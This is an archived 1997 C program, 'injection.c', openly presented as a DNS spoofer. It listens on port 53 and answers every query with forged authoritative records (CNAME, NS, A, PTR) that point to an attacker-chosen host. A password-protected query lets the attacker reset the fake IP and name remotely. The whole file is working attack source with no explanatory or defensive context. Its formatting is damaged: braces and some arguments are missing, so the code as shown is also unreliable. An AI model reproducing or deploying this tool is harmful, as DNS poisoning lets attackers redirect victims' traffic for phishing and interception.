TUCoPS :: Unix :: General :: injectio.c

injection.c - DNS Spoofer


   injection.c  DNS spoofer by savage@apostols.org      30/May/1997

   		based on jizz.c by teak@ib6ub9.com


#include <stdio.h>

#include <stdlib.h>

#include <stdarg.h>

#include <strings.h>

#include <errno.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <signal.h>

#define MAXBUFSIZE		64*1024

#define DEFAULT_TTL 60*5

#define DC_A            1

#define DC_NS           2

#define DC_CNAME        5

#define DC_SOA          6

#define DC_WKS          11

#define DC_PTR          12

#define DC_HINFO        13

#define DC_MINFO        14

#define DC_MX           15

#define DC_TXT          16

typedef struct


    unsigned short id;

    unsigned char rd:1;		/* recursion desired */

    unsigned char tc:1;		/* truncated message */

    unsigned char aa:1;		/* authoritive answer */

    unsigned char opcode:4;	/* purpose of message */

    unsigned char qr:1;		/* response flag */

    unsigned char rcode:4;	/* response code */

    unsigned char unused:2;	/* unused bits */

    unsigned char pr:1;		/* primary server required (non standard) */

    unsigned char ra:1;		/* recursion available */

    unsigned short qdcount;

    unsigned short ancount;

    unsigned short nscount;

    unsigned short arcount;



typedef struct


    unsigned short labellen;

    char label[256];

    unsigned short type;

    unsigned short class;

    unsigned long ttl;

    unsigned short buflen;

    char buf[256];



typedef struct


    dnsheaderrec h;

    dnsrrrec qd[20];

    dnsrrrec an[20];

    dnsrrrec ns[20];

    dnsrrrec ar[20];



char *dnssprintflabel (char *s, char *buf, char *p);

char *dnsaddlabel (char *p, char *label);

void dnstxt2rr (dnsrrrec * rr, char *b);

void dnsbuildpacket (dnsrec * dns, short qdcount, short ancount, short nscount, short arcount,...);

char *dnsaddbuf (char *p, void *buf, short len);

int dnsmakerawpacket (dnsrec * dns, char *buf);

unsigned long default_ttl;

unsigned long 

rev_long (l)

     unsigned long l;


  unsigned long i = 0;

  int n = sizeof (i);

  while (n--)


      i = (i << 8) | (l & 255);

      l >>= 8;


  return i;


char *

dnssprintflabel (char *s, char *buf, char *p)


  unsigned short i, len;

  char *b = NULL;

  len = (unsigned short) *(p++);

  while (len)


      while (len >= 0xC0)


	  if (!b)

	    b = p + 1;

	  p = buf + (ntohs (*((unsigned short *) (p - 1))) & ~0xC000);

	  len = (unsigned short) *(p++);


      for (i = 0; i < len; i++)

	*(s++) = *(p++);

      *(s++) = '.';

      len = (unsigned short) *(p++);


  *(s++) = 0;

  if (b)

    return (b);

  return (p);


char *

dnsaddlabel (char *p, char *label)


  char *p1;

  while ((*label) && (label))


      if ((*label == '.') && (!*(label + 1)))


      p1 = strchr (label, '.');

      if (!p1)

	p1 = strchr (label, 0);

      *(p++) = p1 - label;

      memcpy (p, label, p1 - label);

      p += p1 - label;

      label = p1;

      if (*p1)



  *(p++) = 0;

  return (p);



dnstxt2rr (dnsrrrec * rr, char *b)


  char *tok[20], *p;

  unsigned short numt = 0, i;

  static char *buf = NULL;

  if (!buf)


      if ((buf = malloc (1024)) == NULL)


	  perror ("malloc");

	  exit (-1);



  strcpy (buf, b);

  p = strtok (buf, " \t");



      tok[numt++] = p;


  while (p = strtok (NULL, " \t"));

  p = dnsaddlabel (rr->label, tok[0]);

  rr->labellen = p - rr->label;

  i = 1;

  if (isdigit (*tok[i]))

    rr->ttl = htonl (atol (tok[i++]));


    rr->ttl = htonl (default_ttl);

  if (strcmp (tok[i], "IN") == 0)


  rr->class = htons (1);

  if (strcmp (tok[i], "A") == 0)



      rr->type = htons (DC_A);

      if (i < numt)


	  inet_aton (tok[i], rr->buf);

	  rr->buflen = 4;



	rr->buflen = 0;



  if (strcmp (tok[i], "CNAME") == 0)



      rr->type = htons (DC_CNAME);

      if (i < numt)


	  p = dnsaddlabel (rr->buf, tok[i]);

	  rr->buflen = p - rr->buf;



	rr->buflen = 0;



  if (strcmp (tok[i], "NS") == 0)



      rr->type = htons (DC_NS);

      if (i < numt)


	  p = dnsaddlabel (rr->buf, tok[i]);

	  rr->buflen = p - rr->buf;



	rr->buflen = 0;



  if (strcmp (tok[i], "PTR") == 0)



      rr->type = htons (DC_PTR);

      if (i < numt)


	  p = dnsaddlabel (rr->buf, tok[i]);

	  rr->buflen = p - rr->buf;



	rr->buflen = 0;



  if (strcmp (tok[i], "MX") == 0)



      rr->type = htons (DC_MX);

      if (i < numt)


	  p = rr->buf;

	  *((unsigned short *) p) = htons (atoi (tok[i++]));

	  p += 2;

	  p = dnsaddlabel (p, tok[i]);

	  rr->buflen = p - rr->buf;



	rr->buflen = 0;





dnsbuildpacket (dnsrec * dns, short qdcount, short ancount, short nscount, short arcount,...)


  int i;

  va_list va;

  dns->h.qdcount = htons (qdcount);

  dns->h.ancount = htons (ancount);

  dns->h.nscount = htons (nscount);

  dns->h.arcount = htons (arcount);

  dns->h.rcode = 0;

  va_start (va, arcount);

  for (i = 0; i < qdcount; i++)

    dnstxt2rr (&dns->qd[i], va_arg (va, char *));

  for (i = 0; i < ancount; i++)

    dnstxt2rr (&dns->an[i], va_arg (va, char *));

  for (i = 0; i < nscount; i++)

    dnstxt2rr (&dns->ns[i], va_arg (va, char *));

  for (i = 0; i < arcount; i++)

    dnstxt2rr (&dns->ar[i], va_arg (va, char *));

  va_end (va);


char *

dnsaddbuf (char *p, void *buf, short len)


  memcpy (p, buf, len);

  return (p + len);



dnsmakerawpacket (dnsrec * dns, char *buf)


  char *p;

  int i;

  unsigned short len;

  memcpy (buf, &dns->h, sizeof (dnsheaderrec));

  p = buf + sizeof (dnsheaderrec);

/********** Query ***********/

  for (i = 0; i < ntohs (dns->h.qdcount); i++)


      p = dnsaddbuf (p, dns->qd[i].label, dns->qd[i].labellen);

      p = dnsaddbuf (p, &dns->qd[i].type, 2);

      p = dnsaddbuf (p, &dns->qd[i].class, 2);


/********** Answer ***********/

  for (i = 0; i < ntohs (dns->h.ancount); i++)


      p = dnsaddbuf (p, dns->an[i].label, dns->an[i].labellen);

      p = dnsaddbuf (p, &dns->an[i].type, 2);

      p = dnsaddbuf (p, &dns->an[i].class, 2);

      p = dnsaddbuf (p, &dns->an[i].ttl, 4);

      len = htons (dns->an[i].buflen);

      p = dnsaddbuf (p, &len, 2);

      p = dnsaddbuf (p, dns->an[i].buf, dns->an[i].buflen);


/********** Nameservers ************/

  for (i = 0; i < ntohs (dns->h.nscount); i++)


      p = dnsaddbuf (p, dns->ns[i].label, dns->ns[i].labellen);

      p = dnsaddbuf (p, &dns->ns[i].type, 2);

      p = dnsaddbuf (p, &dns->ns[i].class, 2);

      p = dnsaddbuf (p, &dns->ns[i].ttl, 4);

      len = htons (dns->ns[i].buflen);

      p = dnsaddbuf (p, &len, 2);

      p = dnsaddbuf (p, dns->ns[i].buf, dns->ns[i].buflen);


/********** Additional ************/

  for (i = 0; i < ntohs (dns->h.arcount); i++)


      p = dnsaddbuf (p, dns->ar[i].label, dns->ar[i].labellen);

      p = dnsaddbuf (p, &dns->ar[i].type, 2);

      p = dnsaddbuf (p, &dns->ar[i].class, 2);

      p = dnsaddbuf (p, &dns->ar[i].ttl, 4);

      len = htons (dns->ar[i].buflen);

      p = dnsaddbuf (p, &len, 2);

      p = dnsaddbuf (p, dns->ar[i].buf, dns->ar[i].buflen);


  return (p - buf);


#define BFSIZE	1024


main (int argc, char *argv[])


  int sock, fromlen, numread, len, query;

  struct sockaddr_in sa, from, to;

  struct in_addr rev;

  char *buf, *sendbuf;

  char *domainnamebuf;

  dnsheaderrec *dns;

  char *p;

  dnsrec dnsh;

  char *beginhost_QD, *beginhost_A, *beginhost_srch;

  char *fakenshost_A, *fakens_DOM;

  char *spoofedip_A, *spoofedip_PTR, *spoofedip_rev;

  char *pid_named;

  char FAKEIP[BFSIZE] = "", FAKENAME[BFSIZE] = "The.Lammerz.Houze";

  char mybuff[BFSIZE], *bp = NULL;

  if (argc < 2)


      printf ("usage: \n%s <password>\n");

      exit (-1);


  if ((beginhost_QD = malloc (BFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((beginhost_A = malloc (BFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((beginhost_srch = malloc (BFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((fakenshost_A = malloc (BFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((fakens_DOM = malloc (BFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((spoofedip_A = malloc (BFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((spoofedip_PTR = malloc (BFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((spoofedip_rev = malloc (BFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((buf = malloc (MAXBUFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((sendbuf = malloc (MAXBUFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((domainnamebuf = malloc (MAXBUFSIZE)) == NULL)


      perror ("malloc");

      exit (-1);


  if ((sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)


      perror ("socket");

      exit (-1);


  sa.sin_family = AF_INET;

/*  sa.sin_addr.s_addr = inet_addr(DEFAULTBINDHOST); */

  sa.sin_addr.s_addr = INADDR_ANY;

  sa.sin_port = htons (53);

  if (bind (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)


      perror ("bind");

      exit (-1);


  setvbuf (stdout, NULL, _IONBF, 0);

  while (1)


      fromlen = sizeof (from);

      if ((numread = recvfrom (sock, buf, MAXBUFSIZE, 0, (struct sockaddr *) &from, &fromlen)) < 0)


	  perror ("recvfrom");



      /* Kludge to stop that damn router */

      if (from.sin_addr.s_addr == inet_addr (""))


      dns = (dnsheaderrec *) buf;

      if (dns->qr)


      p = dnssprintflabel (domainnamebuf, buf, &buf[sizeof (dnsheaderrec)]);

      query = ntohs (*(unsigned short *) p);

      strcpy (mybuff, domainnamebuf);

      bp = strtok (mybuff, "@");

      if (bp && *domainnamebuf == '@' && !strcmp (argv[1], bp))


	  bp = strtok (NULL, "@");

	  if (bp)

	    strncpy (FAKEIP, bp, BFSIZE - 1);

	  bp = strtok (NULL, "@");

	  if (bp)

	    strncpy (FAKENAME, bp, BFSIZE - 1);

	  printf ("FakeIP: %s    FakeNAME: %s\n", FAKEIP, FAKENAME);


      strcpy (beginhost_srch, ".");

      snprintf (fakenshost_A, BFSIZE - 1, "ns.%s IN A", FAKENAME);

      snprintf (fakens_DOM, BFSIZE - 1, "%s IN NS ns.%s", FAKENAME, FAKENAME);

      snprintf (spoofedip_A, BFSIZE - 1, "%s IN A %s", FAKENAME, FAKEIP);

      rev.s_addr = rev_long (inet_addr (FAKEIP));

      snprintf (spoofedip_PTR, BFSIZE - 1, "%s.IN-ADDR.ARPA IN PTR %s", (char *) inet_ntoa (rev.s_addr), FAKENAME);

      default_ttl = DEFAULT_TTL;

      printf ("from %s : %d : '%s' (%d)\n", inet_ntoa (from.sin_addr), ntohs (from.sin_port), domainnamebuf, query);

      snprintf (beginhost_QD, BFSIZE - 1, "%s IN", domainnamebuf);

      snprintf (beginhost_A, BFSIZE - 1, "%s 1 IN CNAME %s", domainnamebuf, FAKENAME);

      dnsbuildpacket (&dnsh, 1, 4, 1, 0,







      dnsh.qd[0].type = htons (query);

      dnsh.h.id = ((dnsheaderrec *) buf)->id;

      dnsh.h.qr = 1;

      dnsh.h.aa = 1;

      len = dnsmakerawpacket (&dnsh, sendbuf);

      to.sin_family = AF_INET;

      to.sin_addr.s_addr = from.sin_addr.s_addr;

      to.sin_port = from.sin_port;

      if (sendto (sock, sendbuf, len, 0, (struct sockaddr *) &to, sizeof (to)) < 0)


	  perror ("sendto");





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